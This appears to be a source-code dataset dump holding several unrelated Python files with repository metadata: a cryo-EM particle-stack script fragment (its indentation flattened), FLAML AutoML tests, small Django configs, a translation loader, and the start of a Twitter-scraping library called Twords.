stackpartdata = apStack.getStackParticle(self.params['tiltstackid'], partdict['tilt'])
count += 1
if count%100 == 0:
sys.stderr.write(".")
eulerf.flush()
gamma, theta, phi, tiltangle = apTiltPair.getParticleTiltRotationAngles(stackpartdata)
if gamma is None:
apDisplay.printWarning("Skipping "+str(stackpartdata))
continue
line = operations.spiderOutLine(count, [phi, tiltangle, gamma])
eulerf.write(line)
eulerf.close()
apDisplay.printColor("finished Euler doc file in "+apDisplay.timeString(time.time()-starttime), "cyan")
return eulerfile
#=====================
def appendEulerDoc(self, eulerfile, tiltpartnum, count):
eulerf = open(eulerfile, "a")
stackpartdata = apStack.getStackParticle(self.params['tiltstackid'], tiltpartnum)
gamma, theta, phi, tiltangle = apTiltPair.getParticleTiltRotationAngles(stackpartdata)
if gamma is None:
apDisplay.printWarning("Skipping "+str(stackpartdata))
return
line = operations.spiderOutLine(count, [phi, tiltangle, -1.0*gamma])
eulerf.write(line)
eulerf.close()
#=====================
def uploadResults(self):
if self.params['commit'] is False:
return
# Produce new stacks
oldstack = apStack.getOnlyStackData(self.params['notstackid'], msg=False)
notstack = appiondata.ApStackData()
notstack['path'] = appiondata.ApPathData(path=os.path.abspath(self.params['rundir']))
notstack['name'] = self.notstackdata['name']
if notstack.query(results=1):
apDisplay.printError("A stack with these parameters already exists")
tiltstack = appiondata.ApStackData()
tiltstack['path'] = appiondata.ApPathData(path=os.path.abspath(self.params['rundir']))
tiltstack['name'] = self.tiltstackdata['name']
if tiltstack.query(results=1):
apDisplay.printError("A stack with these parameters already exists")
# Fill in data and submit
notstack['oldstack'] = oldstack
notstack['hidden'] = False
notstack['substackname'] = self.params['runname']
notstack['description'] = self.params['description']+" ... tilt stack sorted"
notstack['pixelsize'] = oldstack['pixelsize']
notstack.insert()
tiltstack['oldstack'] = oldstack
tiltstack['hidden'] = False
tiltstack['substackname'] = self.params['runname']
tiltstack['description'] = self.params['description']+" ... tilt stack sorted"
tiltstack['pixelsize'] = oldstack['pixelsize']
tiltstack.insert()
# Insert stack images
apDisplay.printMsg("Inserting stack particles")
count=0
for partdict in parttree:
count += 1
if count % 100 == 0:
sys.stderr.write("\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b")
sys.stderr.write(str(count)+" of "+(str(total))+" complete")
# Get particles from the old stacks
oldnotparticle = apStack.getStackParticle(self.params['notstackid'], partdict['not'])
oldtiltparticle = apStack.getStackParticle(self.params['tiltstackid'], partdict['tilt'])
# Insert particle
notparticle = appiondata.ApStackParticleData()
notparticle.update(oldnotparticle)
notparticle['particleNumber'] = count
notparticle['stack'] = notstack
notparticle.insert()
tiltparticle = appiondata.ApStackParticleData()
tiltparticle.update(oldtiltparticle)
tiltparticle['particleNumber'] = count
tiltparticle['stack'] = tiltstack
tiltparticle.insert()
apDisplay.printMsg("\n%d particles have been inserted into the tilt synchronized stacks"%(count))
# Insert runs in stack
apDisplay.printMsg("Inserting Runs in Stack")
runsinstack = apStack.getRunsInStack(self.params['notstackid'])
for run in runsinstack:
newrunsq = appiondata.ApRunsInStackData()
newrunsq['stack'] = notstack
newrunsq['stackRun'] = run['stackRun']
newrunsq.insert()
runsinstack = apStack.getRunsInStack(self.params['tiltstackid'])
for run in runsinstack:
newrunsq = appiondata.ApRunsInStackData()
newrunsq['stack'] = tiltstack
newrunsq['stackRun'] = run['stackRun']
newrunsq.insert()
apDisplay.printMsg("finished")
return
#=====================
def makeNewStacks(self, parttree):
### untilted stack
self.notstackdata = apStack.getOnlyStackData(self.params['notstackid'])
notstackfile = os.path.join(self.notstackdata['path']['path'], self.notstackdata['name'])
### tilted stack
if not self.tiltstackdata:
self.tiltstackdata = apStack.getOnlyStackData(self.params['tiltstackid'])
tiltstackfile = os.path.join(self.tiltstackdata['path']['path'], self.tiltstackdata['name'])
### make doc file of Euler angles
#eulerfile = self.makeEulerDoc(parttree)
eulerfile = os.path.join(self.params['rundir'], "eulersdoc"+self.timestamp+".spi")
if os.path.isfile(eulerfile):
apFile.removeFile(eulerfile)
count = 0
notstacklist = []
tiltstacklist = []
sizelimit = 2048
notbox = apImagicFile.getBoxsize(notstackfile)
tiltbox = apImagicFile.getBoxsize(tiltstackfile)
tiltstacks = []
notstacks = []
t0 = time.time()
for partdict in parttree:
### print friendly message
if count % 100 == 0:
backs = "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"
sys.stderr.write(backs+backs+backs+backs)
if count > sizelimit:
esttime = (len(parttree)/float(count)-1.0)*(time.time()-t0)
sys.stderr.write(str(count)+" particles of "+str(len(parttree))
+", "+apDisplay.timeString(esttime)+" remaining")
else:
sys.stderr.write(str(count)+" particles of "+str(len(parttree)))
### save stacks to file to save memory
if count%sizelimit == 0:
if count > 1:
apDisplay.printMsg("Writing stacks to file")
t1 = time.time()
tiltname = os.path.join(self.params['rundir'], "tiltstack%d.hed"%(count))
apFile.removeStack(tiltname)
apImagicFile.writeImagic(tiltstacklist, tiltname, msg=False)
tiltstacks.append(tiltname)
apDisplay.printMsg("finished tilted stack in "+apDisplay.timeString(time.time()-t1))
t1 = time.time()
notname = os.path.join(self.params['rundir'], "notstack%d.hed"%(count))
apFile.removeStack(notname)
apImagicFile.writeImagic(notstacklist, notname, msg=False)
notstacks.append(notname)
apDisplay.printMsg("finished untilted stack in "+apDisplay.timeString(time.time()-t1))
### reset stacks
apDisplay.printMsg("Reset stacks in memory")
notstacklist = []
tiltstacklist = []
### increment count
count += 1
### write to Euler doc
self.appendEulerDoc(eulerfile, partdict['tilt'], count)
### untilted stack
notpartarray = apImagicFile.readSingleParticleFromStack(notstackfile, partdict['not'], notbox, False)
notstacklist.append(notpartarray)
### tilted stack
tiltpartarray = apImagicFile.readSingleParticleFromStack(tiltstackfile, partdict['tilt'], tiltbox, False)
tiltstacklist.append(tiltpartarray)
### write remaining particles to stack
if len(notstacklist) > 0:
apDisplay.printMsg("Writing stacks to file")
t1 = time.time()
tiltname = os.path.join(self.params['rundir'], "tiltstack%d.hed"%(count))
apFile.removeStack(tiltname)
apImagicFile.writeImagic(tiltstacklist, tiltname, msg=False)
tiltstacks.append(tiltname)
apDisplay.printMsg("finished tilted stack in "+apDisplay.timeString(time.time()-t1))
t1 = time.time()
notname = os.path.join(self.params['rundir'], "notstack%d.hed"%(count))
apFile.removeStack(notname)
apImagicFile.writeImagic(notstacklist, notname, msg=False)
notstacks.append(notname)
apDisplay.printMsg("finished untilted stack in "+apDisplay.timeString(time.time()-t1))
### merge NOT stack
notname = os.path.join(self.params['rundir'], "notstack.hed")
apImagicFile.mergeStacks(notstacks, notname)
for stackname in notstacks:
apFile.removeStack(stackname, warn=False)
### merge TILT stack
tiltname = os.path.join(self.params['rundir'], "tiltstack.hed")
apImagicFile.mergeStacks(tiltstacks, tiltname)
for stackname in tiltstacks:
apFile.removeStack(stackname, warn=False)
### upload results
if self.params['commit'] is True:
self.uploadResults()
#=====================
def start(self):
parttree = self.getPartcileLists()
self.makeNewStacks(parttree)
#=====================
if __name__ == "__main__":
tiltstacks = tiltStackSync()
tiltstacks.start()
tiltstacks.close()
| 11,568 | 870 | 23 |
7c5fb9f45657ecafdf1c38f92248649f38bb6604 | 260 | py | Python | 05_debugging/solutions/bug_03.py | nachrisman/PHY494 | bac0dd5a7fe6f59f9e2ccaee56ebafcb7d97e2e7 | [
"CC-BY-4.0"
] | null | null | null | 05_debugging/solutions/bug_03.py | nachrisman/PHY494 | bac0dd5a7fe6f59f9e2ccaee56ebafcb7d97e2e7 | [
"CC-BY-4.0"
] | null | null | null | 05_debugging/solutions/bug_03.py | nachrisman/PHY494 | bac0dd5a7fe6f59f9e2ccaee56ebafcb7d97e2e7 | [
"CC-BY-4.0"
] | null | null | null | # bug 3
# http://asu-compmethodsphysics-phy494.github.io/ASU-PHY494/2017/01/24/04_Debugging_1/#activity-fix-as-many-bugs-as-possible
# Print "error" for input 0:
x = float(input("Enter non-zero number --> "))
if x == 0:
print("ERROR: number cannot be 0")
| 28.888889 | 124 | 0.7 | # bug 3
# http://asu-compmethodsphysics-phy494.github.io/ASU-PHY494/2017/01/24/04_Debugging_1/#activity-fix-as-many-bugs-as-possible
# Print "error" for input 0:
x = float(input("Enter non-zero number --> "))
if x == 0:
print("ERROR: number cannot be 0")
| 0 | 0 | 0 |
e009120c4e68c7222536c86157b18d6d0fc86315 | 5,348 | py | Python | test/automl/test_notebook_example.py | Qiaochu-Song/FLAML | 28511340528dfc9def29862f5076b4516eb7305f | [
"MIT"
] | null | null | null | test/automl/test_notebook_example.py | Qiaochu-Song/FLAML | 28511340528dfc9def29862f5076b4516eb7305f | [
"MIT"
] | null | null | null | test/automl/test_notebook_example.py | Qiaochu-Song/FLAML | 28511340528dfc9def29862f5076b4516eb7305f | [
"MIT"
] | null | null | null | import sys
from openml.exceptions import OpenMLServerException
from requests.exceptions import ChunkedEncodingError
if __name__ == "__main__":
test_automl(600)
| 36.882759 | 152 | 0.663426 | import sys
from openml.exceptions import OpenMLServerException
from requests.exceptions import ChunkedEncodingError
def test_automl(budget=5, dataset_format="dataframe", hpo_method=None):
from flaml.data import load_openml_dataset
import urllib3
performance_check_budget = 600
if (
sys.platform == "darwin"
and budget < performance_check_budget
and dataset_format == "dataframe"
and "3.9" in sys.version
):
budget = performance_check_budget # revise the buget on macos
try:
X_train, X_test, y_train, y_test = load_openml_dataset(
dataset_id=1169, data_dir="test/", dataset_format=dataset_format
)
except (
OpenMLServerException,
ChunkedEncodingError,
urllib3.exceptions.ReadTimeoutError,
) as e:
print(e)
return
""" import AutoML class from flaml package """
from flaml import AutoML
automl = AutoML()
settings = {
"time_budget": budget, # total running time in seconds
"metric": "accuracy", # primary metrics can be chosen from: ['accuracy','roc_auc','roc_auc_ovr','roc_auc_ovo','f1','log_loss','mae','mse','r2']
"task": "classification", # task type
"log_file_name": "airlines_experiment.log", # flaml log file
"seed": 7654321, # random seed
"hpo_method": hpo_method,
}
"""The main flaml automl API"""
automl.fit(X_train=X_train, y_train=y_train, **settings)
""" retrieve best config and best learner """
print("Best ML leaner:", automl.best_estimator)
print("Best hyperparmeter config:", automl.best_config)
print("Best accuracy on validation data: {0:.4g}".format(1 - automl.best_loss))
print(
"Training duration of best run: {0:.4g} s".format(automl.best_config_train_time)
)
print(automl.model.estimator)
print("time taken to find best model:", automl.time_to_find_best_model)
""" pickle and save the automl object """
import pickle
with open("automl.pkl", "wb") as f:
pickle.dump(automl, f, pickle.HIGHEST_PROTOCOL)
""" compute predictions of testing dataset """
y_pred = automl.predict(X_test)
print("Predicted labels", y_pred)
print("True labels", y_test)
y_pred_proba = automl.predict_proba(X_test)[:, 1]
""" compute different metric values on testing dataset """
from flaml.ml import sklearn_metric_loss_score
accuracy = 1 - sklearn_metric_loss_score("accuracy", y_pred, y_test)
print("accuracy", "=", accuracy)
print(
"roc_auc", "=", 1 - sklearn_metric_loss_score("roc_auc", y_pred_proba, y_test)
)
print("log_loss", "=", sklearn_metric_loss_score("log_loss", y_pred_proba, y_test))
if budget >= performance_check_budget:
assert accuracy >= 0.669, "the accuracy of flaml should be larger than 0.67"
from flaml.data import get_output_from_log
(
time_history,
best_valid_loss_history,
valid_loss_history,
config_history,
metric_history,
) = get_output_from_log(filename=settings["log_file_name"], time_budget=6)
for config in config_history:
print(config)
print(automl.resource_attr)
print(automl.max_resource)
print(automl.min_resource)
if budget < performance_check_budget:
automl.fit(X_train=X_train, y_train=y_train, ensemble=True, **settings)
def test_automl_array():
test_automl(5, "array", "bs")
def test_mlflow():
import subprocess
import sys
subprocess.check_call([sys.executable, "-m", "pip", "install", "mlflow"])
import mlflow
from flaml.data import load_openml_task
try:
X_train, X_test, y_train, y_test = load_openml_task(
task_id=7592, data_dir="test/"
)
except (OpenMLServerException, ChunkedEncodingError) as e:
print(e)
return
""" import AutoML class from flaml package """
from flaml import AutoML
automl = AutoML()
settings = {
"time_budget": 5, # total running time in seconds
"metric": "accuracy", # primary metrics can be chosen from: ['accuracy','roc_auc','roc_auc_ovr','roc_auc_ovo','f1','log_loss','mae','mse','r2']
"estimator_list": ["lgbm", "rf", "xgboost"], # list of ML learners
"task": "classification", # task type
"sample": False, # whether to subsample training data
"log_file_name": "adult.log", # flaml log file
}
mlflow.set_experiment("flaml")
with mlflow.start_run() as run:
automl.fit(X_train=X_train, y_train=y_train, **settings)
mlflow.sklearn.log_model(automl, "automl")
loaded_model = mlflow.pyfunc.load_model(f"{run.info.artifact_uri}/automl")
print(loaded_model.predict(X_test))
automl._mem_thres = 0
print(automl.trainable(automl.points_to_evaluate[0]))
settings["use_ray"] = True
try:
with mlflow.start_run() as run:
automl.fit(X_train=X_train, y_train=y_train, **settings)
mlflow.sklearn.log_model(automl, "automl")
automl = mlflow.sklearn.load_model(f"{run.info.artifact_uri}/automl")
print(automl.predict_proba(X_test))
except ImportError:
pass
# subprocess.check_call([sys.executable, "-m", "pip", "uninstall", "mlflow"])
if __name__ == "__main__":
test_automl(600)
| 5,110 | 0 | 69 |
c1e967e0502cb36c1b0d66fa783de85952b4bbed | 241 | py | Python | neighbor_app/admin.py | FloiceNyota98/Neighborhood | ef60aa45e50ec093fcccad583ccb914114d7d71f | [
"MIT"
] | 1 | 2021-07-31T07:59:56.000Z | 2021-07-31T07:59:56.000Z | neighbor_app/admin.py | FloiceNyota98/Neighborhood | ef60aa45e50ec093fcccad583ccb914114d7d71f | [
"MIT"
] | null | null | null | neighbor_app/admin.py | FloiceNyota98/Neighborhood | ef60aa45e50ec093fcccad583ccb914114d7d71f | [
"MIT"
] | 1 | 2021-08-31T09:36:53.000Z | 2021-08-31T09:36:53.000Z | from django.contrib import admin
from .models import Business, NeighborHood, Post, Profile
# Register your models here.
admin.site.register(Profile)
admin.site.register(Business)
admin.site.register(Post)
admin.site.register(NeighborHood)
| 24.1 | 57 | 0.813278 | from django.contrib import admin
from .models import Business, NeighborHood, Post, Profile
# Register your models here.
admin.site.register(Profile)
admin.site.register(Business)
admin.site.register(Post)
admin.site.register(NeighborHood)
| 0 | 0 | 0 |
d296585d1c8d998824941555345adc6ce57ce849 | 1,142 | py | Python | divico_ctrl/translation.py | imldresden/mcv-displaywall | d08cf6fab869ee03d8b3af203dd0e55b42ab4605 | [
"MIT"
] | 2 | 2019-12-12T20:57:37.000Z | 2021-09-29T02:59:19.000Z | divico_ctrl/translation.py | imldresden/mcv-displaywall | d08cf6fab869ee03d8b3af203dd0e55b42ab4605 | [
"MIT"
] | null | null | null | divico_ctrl/translation.py | imldresden/mcv-displaywall | d08cf6fab869ee03d8b3af203dd0e55b42ab4605 | [
"MIT"
] | null | null | null | import json
import os
T = Translation()
| 30.864865 | 95 | 0.585814 | import json
import os
class Translation(object):
def __init__(self, default_lang='de'):
self.__langs = {}
self.__default_lang = default_lang
# loading translations
path = os.path.dirname(os.path.abspath(__file__))
lang_files = {
'de': path + '/../assets/translations/de.json',
'en': path + '/../assets/translations/en.json'
}
for key, file in lang_files.iteritems():
with open(file) as data_file:
self.__langs[key] = json.load(data_file)
def tl(self, msg, lang=None):
language = self.__default_lang if lang is None else lang
if len(self.__langs[language]) == 0:
return msg
assert language in self.__langs
result = msg
if msg in self.__langs[language]:
unic = unicode(self.__langs[language][msg])
result = unic.encode('utf-8')
else:
# todo use logging_base for the following debug output
print "Translation: \'{}\' not found! Please add message to json file.".format(msg)
return result
T = Translation()
| 1,018 | 5 | 76 |
cbec29e23f3954ee6849cec0a554ca2c1e06eec3 | 439 | py | Python | rudra/rudra/urls.py | nerddesire/django-practice | bb9c626941240b7ee0fdc22cbc4e762ff422d30f | [
"Apache-2.0"
] | null | null | null | rudra/rudra/urls.py | nerddesire/django-practice | bb9c626941240b7ee0fdc22cbc4e762ff422d30f | [
"Apache-2.0"
] | null | null | null | rudra/rudra/urls.py | nerddesire/django-practice | bb9c626941240b7ee0fdc22cbc4e762ff422d30f | [
"Apache-2.0"
] | null | null | null | from django.conf.urls import include, url
from django.contrib import admin
from inventory import views as inventory_index
urlpatterns = [
# Examples:
# url(r'^$', 'rudra.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^$', inventory_index.index, name='index'),
url(r'^item/(?P<id>\d+)/', inventory_index.item_detail, name='item_detail'),
url(r'^admin/', include(admin.site.urls)),
]
| 29.266667 | 80 | 0.651481 | from django.conf.urls import include, url
from django.contrib import admin
from inventory import views as inventory_index
urlpatterns = [
# Examples:
# url(r'^$', 'rudra.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^$', inventory_index.index, name='index'),
url(r'^item/(?P<id>\d+)/', inventory_index.item_detail, name='item_detail'),
url(r'^admin/', include(admin.site.urls)),
]
| 0 | 0 | 0 |
1314845f31133e2f039af920f60d0139625cdac7 | 51,179 | py | Python | twords/twords.py | ddandur/Twords | 63675d89af8d8c7fda939a3e3911ccc4417644a9 | [
"MIT"
] | 17 | 2017-08-16T12:27:16.000Z | 2021-05-23T12:41:56.000Z | twords/twords.py | ddandur/Twords | 63675d89af8d8c7fda939a3e3911ccc4417644a9 | [
"MIT"
] | null | null | null | twords/twords.py | ddandur/Twords | 63675d89af8d8c7fda939a3e3911ccc4417644a9 | [
"MIT"
] | 7 | 2017-08-15T13:20:42.000Z | 2020-03-01T16:59:50.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
import time
import datetime
import string
from os import listdir
from os.path import join as pathjoin
from math import log, ceil
import subprocess
import pandas as pd
import nltk
from nltk.corpus import stopwords
import matplotlib.pyplot as plt
import tailer
from ttp import ttp
# use this if you want to include modules from a subfolder
#cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],"GetOldTweets-python")))
#if cmd_subfolder not in sys.path:
# sys.path.insert(0, cmd_subfolder)
pd.set_option('display.max_colwidth', -1)
class Twords(object):
""" Object that takes in tweets from Java twitter search engine and allows
manipulation, analysis and visualization.
Attributes:
jar_folder_path (string): path to where java jar twitter search files
are stored
data_path (string): path to data set from java twitter search.
It can be either path to single file, or path to
directory containing several csv files. Files are
assumed to be in format give by output of
create_java_tweets function below
background_path (string): path to background data. Form of background
data file is csv with columns 'word', 'occurrences',
and 'frequency' for words as they occur in some
background corpus.
background_dict (dictionary): dictionary of background rates of English
words, used in comparing word frequencies.
Can be set using create_Background_dict
function.
search_terms (list of strings): list of search terms used when collecting
tweets using create_java_tweets
tweets_df (pandas dataframe): pandas dataframe that holds all tweet data.
This is central object in an instance of
Twords.
word_bag (list of strings): list of all word tokens in tweets contained
in tweets_df, not including stop words (stop
words are contained in self.stop_words)
stop_words (list of string): list of words that shouldn't be included when
computing word bag for tweets. This includes
standard English words like "the" as well as
Twitter-data-specific things like "https://"
freq_dist (nltk object): nltk.FreqDist(self.word_bag); nltk object that
contains statistical properties of words in
word_bag
word_freq_df (pandas dataframe): pandas dataframe containing top n words
in tweets data along with data like
word frequency, word frequency divided
by background frequency for that word, etc.
More info under function
create_word_freq_df(self, n),
which creates word_freq_df.
"""
#############################################################
# Methods to set attributes
#############################################################
def set_Search_terms(self, search_terms):
""" search_terms is a list of strings that were used in twitter search
to obtain data in tweets_df.
The strings will be converted to unicode inside Twords, even though the
user may enter them as ordinary strings.
"""
assert type(search_terms) == list
for term in search_terms:
assert type(term) in (str, unicode)
unicode_list = [x.decode("utf-8") if type(x) == str
else x for x in search_terms]
self.search_terms = unicode_list
def create_Background_dict(self):
""" Create the dictionary of background word rates from file in the
background data path.
key: word (string)
value: tuple of form (frequency, occurrences), where
frequency is frequency of word in background data set, and
occurrences is total number of occurrences in background data
set
"""
sample_rates = pd.read_csv(self.background_path, sep=",", encoding='utf-8')
background_dict = dict(zip(sample_rates["word"], zip(sample_rates["frequency"],sample_rates["occurrences"])))
self.background_dict = background_dict
def create_Stop_words(self):
""" Create list of stop words used in create_word_bag function.
Stop words created here are defaults - the user may add new stop words
later with the add_stop_words function.
This default list combines English stopwords from nltk corpus
(stopwords), punctuation marks from python standard string library,
and a custom-list the author found useful when parsing tweets.
"""
punctuation = [item.decode('utf-8') for item in list(string.punctuation)]
stop = stopwords.words('english') + punctuation + \
[u'rt', u'RT', u'via', u'http', u"n't", u"'s", u"...", u"''",
u"'m", u"--", u"'ll", u"'ve", u"'re", u"//www"]
self.stop_words = stop
##############################################################
# Methods to gather tweets via keyword search with
# Java GetOldTweets
##############################################################
def create_java_tweets(self, total_num_tweets, tweets_per_run, querysearch,
final_until=None, output_folder="output",
decay_factor=4, all_tweets=True):
""" Function that calls java program iteratively further and further
back in time until the desired number of tweets are collected. The
"until" parameter gives the most recent date tweets can be found from,
and the search function works backward in time progressively from that
date until the max number of tweets are found. Thus each new call to
_get_one_java_run_and_return_last_line_date will start the search one
day further in the past.
total_num_tweets: (int) total number of tweets to collect
tweets_per_run: (int) number of tweets in call to java program - should
not be over 50,000, better to keep around 10,000
querysearch: (string) string defining query for twitter search - see
Henrique code
(e.g, "europe refugees" for search for tweets containing
BOTH "europe" and "refugees" - currently putting in OR by
hand does not yield desired result, so two separate
searches will have to be done for "OR" between words)
final_until: (string) date string of the form '2015-07-31' that gives
ending date that tweets are searched before (this is
distinguished from the changing "until" that is used in
the calls to _get_one_java_run_and_return_last_line_date).
If left as "None" it defaults to the current date.
output_folder: (string) name of folder to put output in
decay_factor: (int) how quickly to wind down tweet search if errors
occur and no tweets are found in a run - a failed run
will count as tweets_per_run/decay_factor tweets found,
so the higher the factor the longer the program will try
to search for tweets even if it gathers none in a run
all_tweets: (bool) flag for which jar to use - True means use
all_tweets jar, False means use top_tweets jar
"""
if final_until is None:
final_until = str(datetime.datetime.now())[:10]
print "Collecting", str(total_num_tweets), "tweets with", \
str(tweets_per_run), "tweets per run."
print "Expecting", \
str(int(ceil(total_num_tweets/float(tweets_per_run)))), \
"total runs"
start_time = time.time()
tweets_searched = 0
run_counter = 1
# create folder that tweets will be saved into
subprocess.call(['mkdir', output_folder])
until = final_until
while tweets_searched < total_num_tweets:
print "Collecting run", run_counter
run_counter += 1
# call java program and get date of last tweet found
last_date = self._get_one_java_run_and_return_last_line_date(
querysearch, until, tweets_per_run, all_tweets)
# rename each output file and put into new folder - output file
# is named by until date
new_file_location = output_folder + '/' + querysearch + '_' + \
until + '.csv'
subprocess.call(['mv', 'output_got.csv', new_file_location])
# if last_date is usual date proceed as normal - if not raise error
# and stop search
if self._validate_date(last_date):
until = last_date
tweets_searched += tweets_per_run
else:
# set search date one day further in past
new_until_date_object = datetime.datetime.strptime(until, '%Y-%m-%d') \
- datetime.timedelta(days=1)
until = str(new_until_date_object)[:10]
# consider this a few tweets searched so program doesn't run
# forever if it gathers no tweets
tweets_searched += (tweets_per_run)/float(decay_factor)
self.data_path = output_folder
self.search_terms = querysearch.split()
print "Total time to collect", str(total_num_tweets), "tweets:", \
round((time.time() - start_time)/60.,1), "minutes"
def get_tweets_from_single_java_csv(self):
""" Takes path to twitter data obtained with java tweet search library
and builds a dataframe of the tweets and their accompanying
information. Dataframe has columns for username, date, retweets,
favorites, text, mentions, and hashtag. The dataframe is stored under
the attribute tweets_pd.
"""
# Read in csv file with many columns to account for people who put many
# semicolons in tweets, then keep only the rows that don't have
# semicolons in a tweet by dropping rows with too many columns.
# (Semicolons are the delimeter in the java twitter search library.)
tweets = pd.read_csv(self.data_path, sep=";",
names=list('abcdefghijklmno'), encoding='utf-8')
tweets = tweets[tweets.k.isnull()]
# Rename the columns with correct labels and drop row that is just
# column names (this will index dataframe starting at 1).
tweets.columns = tweets.iloc[0]
tweets.drop(0, inplace=True)
# Drop the extra columns on the end
tweets = tweets[["username", "date", "retweets", "favorites", "text",
"mentions", "hashtags", "id", "permalink"]]
# Reindex dataframe
tweets.index = range(len(tweets))
self.tweets_df = tweets
def get_java_tweets_from_csv_list(self, list_of_csv_files=None):
""" Create tweets_df from list of tweet csv files
list_of_csv_files: python list of paths (the paths are strings) to csv
files containing tweets - if list_of_csv_files is
None then the files contained inside self.data_path
are used
"""
if list_of_csv_files is None:
list_of_csv_files = self._get_list_of_csv_files(self.data_path)
path_dict = {}
# create dictionary with paths for keys and corresponding tweets
# dataframe for values
for path in list_of_csv_files:
tweets = pd.read_csv(path, sep=";", names=list('abcdefghijklmno'),
encoding='utf-8')
tweets = tweets[tweets.k.isnull()]
tweets.columns = tweets.iloc[0]
tweets.drop(0, inplace=True)
tweets = tweets[["username", "date", "retweets", "favorites",
"text", "mentions", "hashtags", "id", "permalink"]]
tweets.index = range(len(tweets))
path_dict[path] = tweets
# join all created dataframes together into final tweets_df dataframe
self.tweets_df = pd.concat(path_dict.values(), ignore_index=True)
def _get_one_java_run_and_return_last_line_date(self, querysearch, until,
maxtweets, all_tweets=True,
since=None,
return_line=True):
""" Create one java csv using java jar (either Top Tweets or All tweets
as specified in all_tweets tag) and return date string from last tweet
collected.
querysearch: (string) query string, usually one word - multiple words
imply an "AND" between them
maxtweets: (int) number of tweets to return
since: (string of form '2015-09-30') string of date to search since;
this is optional and won't be used when using the
create_java_tweets function
until: (string of form '2015-09-30') string of date to search until,
since search is conducted backwards in time
return_line (bool): whether to return date from last line or not; if
true the date from the last line in the csv is
returned
"""
start_time = time.time()
# choose which jar file to use
jar_string = self.jar_folder_path + '/got_top_tweets.jar'
if all_tweets:
jar_string = self.jar_folder_path + '/got_all_tweets.jar'
# create search string
quotation_mark = '"'
query_string = 'querysearch=' + quotation_mark + querysearch + quotation_mark
until_string = 'until=' + until
maxtweets_string = 'maxtweets=' + str(maxtweets)
# create output_got.csv file of tweets with these search parameters
if since is None:
subprocess.call(['java', '-jar', jar_string, query_string,
until_string, maxtweets_string])
else:
since_string = 'since=' + since
subprocess.call(['java', '-jar', jar_string, query_string,
since_string, until_string, maxtweets_string])
# find date on last tweet in this file (in last line of file)
last_line = tailer.tail(open('output_got.csv'), 1)[0]
date_position = last_line.find(';')
date_string = last_line[date_position+1:date_position+11]
date_string = self._convert_date_to_standard(date_string)
print "Time to collect", str(maxtweets), "tweets:", \
round((time.time() - start_time)/60., 1), "minutes"
if return_line:
return date_string
def _get_list_of_csv_files(self, directory_path):
""" Return list of csv files inside a directory
directory_path: (string) path to directory holding csv files of
interest
"""
return [pathjoin(directory_path, f) for f in listdir(directory_path)
if f[-4:] == '.csv']
def _validate_date(self, date_text):
""" Return true if date_text is string of form '2015-06-29',
false otherwise.
date_text (string): date
"""
try:
datetime.datetime.strptime(date_text, '%Y-%m-%d')
return True
except ValueError:
return False
##############################################################
# Methods to gather user timeline tweets with
# Java GetOldTweets
##############################################################
def get_user_tweets(self, user, max_tweets, start_date=None,
end_date=None, all_tweets=True, return_line=True):
""" Returns max_tweets from Twitter timeline of user. Appears to work
better when start and end dates are included. The returned tweets
include tweets on the start_date, and up to (but not including) tweets
on the end_date.
If only an end_date is provided, then the tweets are searched backward
in time starting at the end date and continuing until max_tweets
have been found.
Creates folder named by twitter username searched that contains tweets
in series of csv files.
user (string): Twitter handle of user, e.g. barackobama
max_tweets (int): number of tweets to return for that user; set
max_tweets to -1 to return all tweets in timeline
start_date (string): starting date for search of form "2015-09-30"
end_date (string): ending date for search of form "2015-09-30"
all_tweets (bool): whether to use "top_tweets" or "all_tweets" java
jar file
return_line (bool): whether to return date on last tweet returned;
needed for function that makes repeated calls to
this function, e.g. get_all_user_tweets
"""
start_time = time.time()
# choose which jar file to use
jar_string = self.jar_folder_path + '/got_top_tweets.jar'
if all_tweets:
jar_string = self.jar_folder_path + '/got_all_tweets.jar'
# create search string
user_string = 'username=' + user
maxtweets_string = 'maxtweets=' + str(max_tweets)
if start_date is not None:
since_string = 'since=' + start_date
if end_date is not None:
until_string = 'until=' + end_date
# create output_got.csv file of tweets with these search parameters
if start_date is None and end_date is None:
subprocess.call(['java', '-jar', jar_string, user_string,
maxtweets_string])
elif start_date is None and end_date is not None:
subprocess.call(['java', '-jar', jar_string, user_string,
until_string, maxtweets_string])
else:
subprocess.call(['java', '-jar', jar_string, user_string,
since_string, until_string, maxtweets_string])
# find date on last tweet in this file (in last line of file)
last_line = tailer.tail(open('output_got.csv'), 1)[0]
date_position = last_line.find(';')
date_string = last_line[date_position+1:date_position+11]
date_string = self._convert_date_to_standard(date_string)
print "Time to collect", str(max_tweets), "tweets:", \
round((time.time() - start_time)/60.,1), "minutes"
if return_line:
return date_string
def get_all_user_tweets(self, user, tweets_per_run):
""" Return all tweets in a user's timeline. This is necessary
to do in batches since one call to get_user_tweets does not return
all of the tweets (too many in one run breaks the web-scrolling
functionality of GetOldTweets). The tweets are saved as series of
csv files into output folder named by username of twitter user.
The final date is one day after the current date, since tweets are
returned up to (but not including) the end_date in get_user_tweets
function.
This function will return duplicates of some tweets to be sure all
tweets are obtained - these can be eliminated by simply dropping
duplicates in the text column of resulting pandas dataframe.
Function typically fails to return every single tweet, but captures
most (~87 percent for barackobama) - best performance when
tweets_per_run is around 500.
Creates: folder (named by username searched) of csv files
user (string): twitter handle of user, e.g. "barackobama"
tweets_per_run (int): how many tweets to pull in each run
"""
# increment the date one day forward from returned day when calling
# get_user_tweets to be sure all tweets in overlapping
# range are returned - experimentation showed that tweets on the edge
# between date runs can be lost otherwise
start_time = time.time()
print "Collecting tweets with", str(tweets_per_run), "tweets per run."
# create folder that tweets will be saved into
subprocess.call(['mkdir', user])
# set one day in future so that all tweets up to today are returned;
# necessary because tweets are returned on dates up to but not
# including end date
final_until = str(datetime.datetime.now() +
datetime.timedelta(days=1))[:10]
until = final_until
continue_search = True
run_counter = 1
while continue_search:
print "Collecting run", run_counter
run_counter += 1
# call user function and get date of last tweet found
last_date = self.get_user_tweets(user, tweets_per_run,
end_date=until)
# rename each output file and put into new folder - output file
# is named by until date
new_file_location = user + '/' + until + '.csv'
subprocess.call(['mv', 'output_got.csv', new_file_location])
